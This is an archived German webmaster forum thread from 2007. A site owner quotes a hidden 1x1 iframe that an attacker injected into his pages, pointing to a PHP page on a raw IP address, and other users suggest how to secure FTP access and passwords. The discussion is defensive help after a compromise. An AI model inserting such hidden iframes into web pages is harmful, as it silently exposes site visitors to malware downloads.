Du befindest Dich im Archiv vom ABAKUS Online Marketing Forum. Hier kannst Du Dich für das Forum mit den aktuellen Beiträgen registrieren.

Gehackt

Das Board für die kleine Abwechslung. Hast Du was lustiges im Web gefunden oder was offtopic dann hier rein!
Neues Thema Antworten
Thomas B
PostRank 9
PostRank 9
Beiträge: 1810
Registriert: 04.12.2005, 12:50

Beitrag von Thomas B » 22.05.2007, 10:38

Hallo,

hatte heute Morgen schon mein erstes schönes Erlebnis:

In meinem Webpack liegen 5 Domains - alles .html Seiten.

In jede der index.html war kurz unter dem Body folgender Code eingefügt:

<body><iframe src='https://81.95.149.27/logo/index.php' width='1' height='1' style='visibility: hidden;'></iframe>

Der Provider ( Host Europe ) sagt, ich soll so schnell als möglich die FTP Passwörter ändern. Habe ich auch getan, aber wie kann ich mich dagegen schützen, dass so etwas nicht wieder passiert?

Hat vielleicht einer einen guten Tipp?

Anzeige von ABAKUS

von Anzeige von ABAKUS »

Content Erstellung von ABAKUS Internet Marketing
Ihre Vorteile:
  • einzigartige Texte
  • suchmaschinenoptimierte Inhalte
  • eine sinnvolle Content-Strategie
  • Beratung und Umsetzung
Jetzt anfragen: 0511 / 300325-0

Glenmor
PostRank 2
PostRank 2
Beiträge: 49
Registriert: 23.03.2003, 22:46
Wohnort: Oberursel / Hessen / Deutschland

Beitrag von Glenmor » 22.05.2007, 11:39

Verwendest Du ein CMS? Wenn ja Update durchführen den da gibt es desöfteren Zugriffsmöglichkeiten von außen. Ansonsten sicher Passwörter verwenden zB: sowas "^7yK02l'@wuY!:JE" und die sicher speichern https://keepass.info/ weil sonst bringen die sicheren Passwörter nichts. Andere Möglichkeit du hast unbewust den Zugriff von außen (Stichwort chmod 777) erlaupt. Oder es gibt eine Zugriffmöglichkeit über einen andern Server Deines Providers.

Boa
PostRank 9
PostRank 9
Beiträge: 1170
Registriert: 11.11.2003, 00:19
Wohnort: Bremen

Beitrag von Boa » 22.05.2007, 14:18

https://www.abakus-internet-marketing.d ... art-0.html

Der Angreifer kommt über ftp hinein, nachdem er sich mit einem Virus Namens
Exploit.HTML.Iframe.FileDownload Zugriff verschafft hat.